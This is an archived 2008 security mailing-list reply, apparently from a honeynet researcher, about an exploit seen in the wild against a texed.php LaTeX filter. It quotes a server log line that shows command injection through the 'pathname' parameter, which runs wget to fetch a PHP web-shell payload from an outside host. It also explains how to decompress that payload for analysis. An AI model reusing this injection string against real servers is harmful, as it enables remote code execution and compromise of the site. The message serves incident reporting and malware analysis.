2008/12/15 <lent (at) cooper (dot) edu [email concealed]>:
> Exploit in the wild:
>
> We saw this come across:
>
> 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218
>
>
> The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500].
Looks like the usual sort of script to do things like execute
commands, upload/touch/delete files and eval() PHP. Only unusual in
that it's relatively clean and small.
I thought it was obfuscated at first glance, but it's just compressed
- only takes a couple of minutes to turn it into readable source.
(Just need to change ";eval($t) ?>" at the end to ";echo($t) ?>" and
run it from the CLI. Then add line breaks and formatting as required.)
cheers,
Jamie
--
Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie (at) honeynet.org (dot) uk [email concealed]
http://www.ukhoneynet.org/members/jamie/
> Exploit in the wild:
>
> We saw this come across:
>
> 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218
>
>
> The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500].
Looks like the usual sort of script to do things like execute
commands, upload/touch/delete files and eval() PHP. Only unusual in
that it's relatively clean and small.
I thought it was obfuscated at first glance, but it's just compressed
- only takes a couple of minutes to turn it into readable source.
(Just need to change ";eval($t) ?>" at the end to ";echo($t) ?>" and
run it from the CLI. Then add line breaks and formatting as required.)
cheers,
Jamie
--
Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie (at) honeynet.org (dot) uk [email concealed]
http://www.ukhoneynet.org/members/jamie/
[ reply ]